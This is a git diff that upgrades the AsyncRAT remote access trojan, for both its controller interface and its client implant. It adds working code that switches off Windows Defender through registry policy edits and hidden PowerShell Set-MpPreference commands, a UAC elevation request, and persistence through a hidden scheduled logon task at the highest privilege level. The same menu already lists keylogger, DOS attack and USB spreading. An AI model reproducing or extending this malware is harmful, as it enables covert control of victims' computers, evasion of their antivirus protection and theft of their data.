diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj index fee5432..c5c450b 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj +++ b/AsyncRAT-C#/AsyncRAT-Sharp/AsyncRAT-Sharp.csproj @@ -219,6 +219,8 @@ + + diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs index 12e0864..23762ae 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.Designer.cs @@ -38,6 +38,7 @@ this.lv_os = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_version = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.lv_prefor = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); + this.lv_admin = ((System.Windows.Forms.ColumnHeader)(new System.Windows.Forms.ColumnHeader())); this.contextMenuStrip1 = new System.Windows.Forms.ContextMenuStrip(this.components); this.cLIENTOPTIONSToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.cLOSEToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); @@ -51,15 +52,18 @@ this.sENDFILETOMEMORYToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.rEMOTEDESKTOPToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.kEYLOGGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.fILEMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.pROCESSMANAGERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.dISABLESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.wINDOWDSDEFENDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.bOTKILLERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.uSBSPREADToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator2 = new System.Windows.Forms.ToolStripSeparator(); this.bUILDERToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); this.toolStripSeparator3 = new System.Windows.Forms.ToolStripSeparator(); this.aBOUTToolStripMenuItem = new System.Windows.Forms.ToolStripMenuItem(); - this.toolStripMenuItem1 = new System.Windows.Forms.ToolStripMenuItem(); this.statusStrip1 = new System.Windows.Forms.StatusStrip(); this.toolStripStatusLabel1 = new System.Windows.Forms.ToolStripStatusLabel(); this.ping = new System.Windows.Forms.Timer(this.components); @@ -103,7 +107,8 @@ this.lv_user, this.lv_os, this.lv_version, - this.lv_prefor}); + this.lv_prefor, + this.lv_admin}); this.listView1.ContextMenuStrip = this.contextMenuStrip1; this.listView1.Dock = System.Windows.Forms.DockStyle.Fill; this.listView1.FullRowSelect = true; @@ -154,6 +159,11 @@ this.lv_prefor.Text = "PERFORMANCE"; this.lv_prefor.Width = 170; // + // lv_admin + // + this.lv_admin.Text = "PRIVILEGES"; + this.lv_admin.Width = 138; + // // contextMenuStrip1 // this.contextMenuStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -169,14 +179,16 @@ this.toolStripMenuItem1, this.fILEMANAGERToolStripMenuItem, this.pROCESSMANAGERToolStripMenuItem, + this.dISABLESToolStripMenuItem, this.bOTKILLERToolStripMenuItem, this.uSBSPREADToolStripMenuItem, + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem, this.toolStripSeparator2, this.bUILDERToolStripMenuItem, this.toolStripSeparator3, this.aBOUTToolStripMenuItem}); this.contextMenuStrip1.Name = "contextMenuStrip1"; - this.contextMenuStrip1.Size = new System.Drawing.Size(283, 442); + this.contextMenuStrip1.Size = new System.Drawing.Size(283, 502); // // cLIENTOPTIONSToolStripMenuItem // @@ -271,6 +283,14 @@ this.kEYLOGGERToolStripMenuItem.Text = "KEYLOGGER"; this.kEYLOGGERToolStripMenuItem.Click += new System.EventHandler(this.KEYLOGGERToolStripMenuItem_Click); // + // toolStripMenuItem1 + // + this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; + this.toolStripMenuItem1.Name = "toolStripMenuItem1"; + this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); + this.toolStripMenuItem1.Text = "DOS ATTACK"; + this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); + // // fILEMANAGERToolStripMenuItem // this.fILEMANAGERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.filemanager; @@ -287,6 +307,22 @@ this.pROCESSMANAGERToolStripMenuItem.Text = "PROCESS MANAGER"; this.pROCESSMANAGERToolStripMenuItem.Click += new System.EventHandler(this.pROCESSMANAGERToolStripMenuItem_Click); // + // dISABLESToolStripMenuItem + // + this.dISABLESToolStripMenuItem.DropDownItems.AddRange(new System.Windows.Forms.ToolStripItem[] { + this.wINDOWDSDEFENDERToolStripMenuItem}); + this.dISABLESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.disabled; + this.dISABLESToolStripMenuItem.Name = "dISABLESToolStripMenuItem"; + this.dISABLESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.dISABLESToolStripMenuItem.Text = "DISABLES"; + // + // wINDOWDSDEFENDERToolStripMenuItem + // + this.wINDOWDSDEFENDERToolStripMenuItem.Name = "wINDOWDSDEFENDERToolStripMenuItem"; + this.wINDOWDSDEFENDERToolStripMenuItem.Size = new System.Drawing.Size(289, 30); + this.wINDOWDSDEFENDERToolStripMenuItem.Text = "WINDOWDS DEFENDER"; + this.wINDOWDSDEFENDERToolStripMenuItem.Click += new System.EventHandler(this.WINDOWDSDEFENDERToolStripMenuItem_Click); + // // bOTKILLERToolStripMenuItem // this.bOTKILLERToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.botkiller; @@ -303,6 +339,14 @@ this.uSBSPREADToolStripMenuItem.Text = "USB SPREAD"; this.uSBSPREADToolStripMenuItem.Click += new System.EventHandler(this.USBSPREADToolStripMenuItem_Click); // + // gETADMINISTRATORPRIVILEGESToolStripMenuItem + // + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Image = global::AsyncRAT_Sharp.Properties.Resources.uac; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Name = "gETADMINISTRATORPRIVILEGESToolStripMenuItem"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Size = new System.Drawing.Size(282, 30); + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Text = "GET ADMIN PRIVILEGES"; + this.gETADMINISTRATORPRIVILEGESToolStripMenuItem.Click += new System.EventHandler(this.GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click); + // // toolStripSeparator2 // this.toolStripSeparator2.Name = "toolStripSeparator2"; @@ -329,14 +373,6 @@ this.aBOUTToolStripMenuItem.Text = "ABOUT"; this.aBOUTToolStripMenuItem.Click += new System.EventHandler(this.ABOUTToolStripMenuItem_Click); // - // toolStripMenuItem1 - // - this.toolStripMenuItem1.Image = global::AsyncRAT_Sharp.Properties.Resources.ddos; - this.toolStripMenuItem1.Name = "toolStripMenuItem1"; - this.toolStripMenuItem1.Size = new System.Drawing.Size(282, 30); - this.toolStripMenuItem1.Text = "DOS ATTACK"; - this.toolStripMenuItem1.Click += new System.EventHandler(this.ToolStripMenuItem1_Click); - // // statusStrip1 // this.statusStrip1.ImageScalingSize = new System.Drawing.Size(24, 24); @@ -598,6 +634,10 @@ private System.Windows.Forms.ContextMenuStrip contextMenuStrip3; private System.Windows.Forms.ToolStripMenuItem notificationOFFToolStripMenuItem; private System.Windows.Forms.ToolStripMenuItem toolStripMenuItem1; + private System.Windows.Forms.ToolStripMenuItem dISABLESToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem wINDOWDSDEFENDERToolStripMenuItem; + private System.Windows.Forms.ToolStripMenuItem gETADMINISTRATORPRIVILEGESToolStripMenuItem; + private System.Windows.Forms.ColumnHeader lv_admin; } } diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs index c223b0f..3fa3288 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Forms/Form1.cs @@ -42,7 +42,7 @@ namespace AsyncRAT_Sharp { if (!File.Exists(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"))) { - // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); + // File.WriteAllText(Path.Combine(Application.StartupPath, Path.GetFileName(Application.ExecutablePath) + ".config"), Properties.Resources.AsyncRAT_Sharp_exe); Process.Start(Application.ExecutablePath); Environment.Exit(0); } @@ -224,20 +224,24 @@ namespace AsyncRAT_Sharp { if (listView1.SelectedItems.Count > 0) { - try + DialogResult dialogResult = MessageBox.Show(this, "Are you sure you want to unistall", "AsyncRAT | Unistall", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) { - MsgPack msgpack = new MsgPack(); - msgpack.ForcePathObject("Packet").AsString = "uninstall"; - foreach (ListViewItem itm in listView1.SelectedItems) + try { - Clients client = (Clients)itm.Tag; - ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uninstall"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; } - } - catch (Exception ex) - { - MessageBox.Show(ex.Message); - return; } } } @@ -644,10 +648,68 @@ namespace AsyncRAT_Sharp Properties.Settings.Default.Save(); } - private readonly FormDOS formDOS = new FormDOS(); + private readonly FormDOS formDOS = new FormDOS(); private void ToolStripMenuItem1_Click(object sender, EventArgs e) { formDOS.Show(); } + + private void WINDOWDSDEFENDERToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Administrator privileges are required!", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "defender"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text == "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } + + private void GETADMINISTRATORPRIVILEGESToolStripMenuItem_Click(object sender, EventArgs e) + { + if (listView1.SelectedItems.Count > 0) + { + DialogResult dialogResult = MessageBox.Show(this, "Popup UAC prompt? ", "AsyncRAT | Disbale Defender", MessageBoxButtons.YesNo, MessageBoxIcon.Information); + if (dialogResult == DialogResult.Yes) + { + try + { + MsgPack msgpack = new MsgPack(); + msgpack.ForcePathObject("Packet").AsString = "uac"; + foreach (ListViewItem itm in listView1.SelectedItems) + { + if (itm.SubItems[lv_admin.Index].Text != "Administrator") + { + Clients client = (Clients)itm.Tag; + ThreadPool.QueueUserWorkItem(client.BeginSend, msgpack.Encode2Bytes()); + } + } + } + catch (Exception ex) + { + MessageBox.Show(ex.Message); + return; + } + } + } + } } } \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs index 9896812..42ba928 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Handle Packet/HandleListView.cs @@ -31,6 +31,7 @@ namespace AsyncRAT_Sharp.Handle_Packet client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("OS").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Version").AsString); client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Performance").AsString); + client.LV.SubItems.Add(unpack_msgpack.ForcePathObject("Admin").AsString); client.LV.ToolTipText = unpack_msgpack.ForcePathObject("Path").AsString; client.ID = unpack_msgpack.ForcePathObject("HWID").AsString; Program.form1.listView1.Items.Add(client.LV); diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs index bd510c9..256d970 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.Designer.cs @@ -144,6 +144,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap disabled { + get { + object obj = ResourceManager.GetObject("disabled", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// @@ -264,6 +274,16 @@ namespace AsyncRAT_Sharp.Properties { } } + /// + /// Looks up a localized resource of type System.Drawing.Bitmap. + /// + internal static System.Drawing.Bitmap uac { + get { + object obj = ResourceManager.GetObject("uac", resourceCulture); + return ((System.Drawing.Bitmap)(obj)); + } + } + /// /// Looks up a localized resource of type System.Drawing.Bitmap. /// diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx index 9392c35..48843c2 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Properties/Resources.resx @@ -130,9 +130,18 @@ ..\Resources\arrow_up.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + ..\Resources\play-button.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + ..\Resources\disabled.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a + + + ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + ..\Resources\botkiller.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a @@ -178,10 +187,7 @@ ..\Resources\visit.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - ..\Resources\ddos.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a - - - ..\Resources\AsyncRAT-Sharp.exe.config;System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089;Windows-1252 + + ..\Resources\uac.png;System.Drawing.Bitmap, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a \ No newline at end of file diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png new file mode 100644 index 0000000..979db92 Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/disabled.png differ diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png new file mode 100644 index 0000000..72e9d43 Binary files /dev/null and b/AsyncRAT-C#/AsyncRAT-Sharp/Resources/uac.png differ diff --git a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs index 7186c31..c2b65f1 100644 --- a/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs +++ b/AsyncRAT-C#/AsyncRAT-Sharp/Settings.cs @@ -14,6 +14,6 @@ namespace AsyncRAT_Sharp public static string Password { get; set; } public static Aes256 AES{ get; set; } - public static readonly string Version = "AsyncRAT 0.4.6"; + public static readonly string Version = "AsyncRAT 0.4.7"; } } diff --git a/AsyncRAT-C#/Client/Client.csproj b/AsyncRAT-C#/Client/Client.csproj index b48ce74..4fc68ff 100644 --- a/AsyncRAT-C#/Client/Client.csproj +++ b/AsyncRAT-C#/Client/Client.csproj @@ -80,7 +80,9 @@ + + diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs new file mode 100644 index 0000000..4204720 --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUAC.cs @@ -0,0 +1,36 @@ +using Microsoft.Win32; +using System; +using System.Collections.Generic; +using System.Diagnostics; +using System.IO; +using System.Linq; +using System.Security.Principal; +using System.Text; + +namespace Client.Handle_Packet +{ + public class HandleUAC + { + public HandleUAC() + { + if (new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + try + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = Process.GetCurrentProcess().MainModule.FileName, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true, + Verb = "runas" + } + }; + proc.Start(); + Environment.Exit(0); + } + catch { } + } + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs index 2157f7b..ebfe442 100644 --- a/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs +++ b/AsyncRAT-C#/Client/Handle Packet/HandleUninstall.cs @@ -5,6 +5,7 @@ using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Linq; +using System.Security.Principal; using System.Text; namespace Client.Handle_Packet @@ -17,9 +18,22 @@ namespace Client.Handle_Packet { try { - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").DeleteValue(Path.GetFileName(Settings.ClientFullPath)); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/delete /tn {Path.GetFileName(Settings.ClientFullPath)} /f", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); } - catch { } + } + catch { } } ProcessStartInfo Del = null; try diff --git a/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs new file mode 100644 index 0000000..ba23c4b --- /dev/null +++ b/AsyncRAT-C#/Client/Handle Packet/HandleWindowsDefender.cs @@ -0,0 +1,129 @@ +using System; +using Microsoft.Win32; +using System.Diagnostics; +using System.Security.Principal; + +// │ Author : NYAN CAT +// │ Name : Disable Windows Defender v1.0 +// │ Contact : https://github.com/NYAN-x-CAT + +// This program is distributed for educational purposes only. + +namespace Client.Handle_Packet +{ + public class HandleWindowsDefender + { + public HandleWindowsDefender() + { + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) return; + + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender", "DisableAntiSpyware", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableOnAccessProtection", "1"); + RegistryEdit(@"SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableScanOnRealtimeEnable", "1"); + RegistryEdit(@"SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"); //Windows 10 1903 Redstone 6 + + CheckDefender(); + } + + private static void RegistryEdit(string regPath, string name, string value) + { + try + { + using (RegistryKey key = Registry.LocalMachine.OpenSubKey(regPath, RegistryKeyPermissionCheck.ReadWriteSubTree)) + { + if (key == null) + { + Registry.LocalMachine.CreateSubKey(regPath).SetValue(name, value, RegistryValueKind.DWord); + return; + } + if (key.GetValue(name) != (object)value) + key.SetValue(name, value, RegistryValueKind.DWord); + } + } + catch { } + } + + private static void CheckDefender() + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = "Get-MpPreference -verbose", + UseShellExecute = false, + RedirectStandardOutput = true, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + while (!proc.StandardOutput.EndOfStream) + { + string line = proc.StandardOutput.ReadLine(); + + if (line.Contains(@"DisableRealtimeMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableRealtimeMonitoring $true"); //real-time protection + + else if (line.Contains(@"DisableBehaviorMonitoring") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBehaviorMonitoring $true"); //behavior monitoring + + else if (line.Contains(@"DisableBlockAtFirstSeen") && line.Contains("False")) + RunPS("Set-MpPreference -DisableBlockAtFirstSeen $true"); + + else if (line.Contains(@"DisableIOAVProtection") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIOAVProtection $true"); //scans all downloaded files and attachments + + else if (line.Contains(@"DisablePrivacyMode") && line.Contains("False")) + RunPS("Set-MpPreference -DisablePrivacyMode $true"); //displaying threat history + + else if (line.Contains(@"SignatureDisableUpdateOnStartupWithoutEngine") && line.Contains("False")) + RunPS("Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true"); //definition updates on startup + + else if (line.Contains(@"DisableArchiveScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableArchiveScanning $true"); //scan archive files, such as .zip and .cab files + + else if (line.Contains(@"DisableIntrusionPreventionSystem") && line.Contains("False")) + RunPS("Set-MpPreference -DisableIntrusionPreventionSystem $true"); // network protection + + else if (line.Contains(@"DisableScriptScanning") && line.Contains("False")) + RunPS("Set-MpPreference -DisableScriptScanning $true"); //scanning of scripts during scans + + else if (line.Contains(@"SubmitSamplesConsent") && !line.Contains("2")) + RunPS("Set-MpPreference -SubmitSamplesConsent 2"); //MAPSReporting + + else if (line.Contains(@"MAPSReporting") && !line.Contains("0")) + RunPS("Set-MpPreference -MAPSReporting 0"); //MAPSReporting + + else if (line.Contains(@"HighThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -HighThreatDefaultAction 6 -Force"); // high level threat // Allow + + else if (line.Contains(@"ModerateThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -ModerateThreatDefaultAction 6"); // moderate level threat + + else if (line.Contains(@"LowThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -LowThreatDefaultAction 6"); // low level threat + + else if (line.Contains(@"SevereThreatDefaultAction") && !line.Contains("6")) + RunPS("Set-MpPreference -SevereThreatDefaultAction 6"); // severe level threat + } + } + + private static void RunPS(string args) + { + Process proc = new Process + { + StartInfo = new ProcessStartInfo + { + FileName = "powershell", + Arguments = args, + WindowStyle = ProcessWindowStyle.Hidden, + CreateNoWindow = true + } + }; + proc.Start(); + } + + } +} diff --git a/AsyncRAT-C#/Client/Handle Packet/Packet.cs b/AsyncRAT-C#/Client/Handle Packet/Packet.cs index 7836bac..eac8782 100644 --- a/AsyncRAT-C#/Client/Handle Packet/Packet.cs +++ b/AsyncRAT-C#/Client/Handle Packet/Packet.cs @@ -25,35 +25,47 @@ namespace Client.Handle_Packet case "sendMessage": { MessageBox.Show(unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "Ping": { Debug.WriteLine("Server Pinged me " + unpack_msgpack.ForcePathObject("Message").AsString); + break; } - break; case "thumbnails": { new HandleGetScreenShot(); + break; } - break; case "sendFile": { Received(); new HandleSendTo().SendToDisk(unpack_msgpack); + break; } - break; case "sendMemory": { Received(); new HandleSendTo().SendToMemory(unpack_msgpack); + break; + } + + case "defender": + { + new HandleWindowsDefender(); + break; + } + + case "uac": + { + new HandleUAC(); + break; } - break; case "close": { @@ -64,8 +76,8 @@ namespace Client.Handle_Packet } catch { } Environment.Exit(0); + break; } - break; case "restart": { @@ -77,14 +89,14 @@ namespace Client.Handle_Packet catch { } Process.Start(Application.ExecutablePath); Environment.Exit(0); + break; } - break; case "uninstall": { new HandleUninstall(); + break; } - break; case "usbSpread": { diff --git a/AsyncRAT-C#/Client/Install/NormalStartup.cs b/AsyncRAT-C#/Client/Install/NormalStartup.cs index bdf14dd..0b53413 100644 --- a/AsyncRAT-C#/Client/Install/NormalStartup.cs +++ b/AsyncRAT-C#/Client/Install/NormalStartup.cs @@ -3,6 +3,8 @@ using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; +using System.Security.Principal; +using System.Threading; namespace Client.Install { @@ -29,14 +31,31 @@ namespace Client.Install FileStream fs; if (File.Exists(Settings.ClientFullPath)) + { + File.Delete(Settings.ClientFullPath); + Thread.Sleep(1000); fs = new FileStream(Settings.ClientFullPath, FileMode.Create); + } else fs = new FileStream(Settings.ClientFullPath, FileMode.CreateNew); byte[] clientExe = File.ReadAllBytes(Process.GetCurrentProcess().MainModule.FileName); fs.Write(clientExe, 0, clientExe.Length); fs.Dispose(); - Registry.CurrentUser.CreateSubKey(@"Software\Microsoft\Windows\CurrentVersion\Run\").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator)) + Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Run").SetValue(Path.GetFileName(Settings.ClientFullPath), Settings.ClientFullPath); + else + { + Process.Start(new ProcessStartInfo() + { + FileName = "schtasks", + Arguments = $"/create /sc onlogon /rl highest /tn {Path.GetFileName(Settings.ClientFullPath)} /tr " + "\"" + Settings.ClientFullPath + "\"", + CreateNoWindow = true, + ErrorDialog = false, + UseShellExecute = true, + WindowStyle = ProcessWindowStyle.Hidden + }); + } Methods.CloseMutex(); Process.Start(Settings.ClientFullPath); Environment.Exit(0); diff --git a/AsyncRAT-C#/Client/Settings.cs b/AsyncRAT-C#/Client/Settings.cs index f9722c6..6cdf390 100644 --- a/AsyncRAT-C#/Client/Settings.cs +++ b/AsyncRAT-C#/Client/Settings.cs @@ -9,7 +9,7 @@ namespace Client { public static string Ports = "6606"; public static string Host = "127.0.0.1"; - public static string Version = "AsyncRAT 0.4.6"; + public static string Version = "AsyncRAT 0.4.7"; public static string Install = "false"; public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe"); public static string Password = "NYAN CAT"; diff --git a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs index a06ca35..582d9f5 100644 --- a/AsyncRAT-C#/Client/Sockets/ClientSocket.cs +++ b/AsyncRAT-C#/Client/Sockets/ClientSocket.cs @@ -8,6 +8,7 @@ using System.IO; using System.Net.Sockets; using System.Threading; using System.Text; +using System.Security.Principal; // │ Author : NYAN CAT // │ Name : Nyan Socket v0.1 @@ -80,6 +81,7 @@ namespace Client.Sockets Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit"); msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName; msgpack.ForcePathObject("Version").AsString = Settings.Version; + msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User"); TheCPUCounter.NextValue(); msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%"; return msgpack.Encode2Bytes();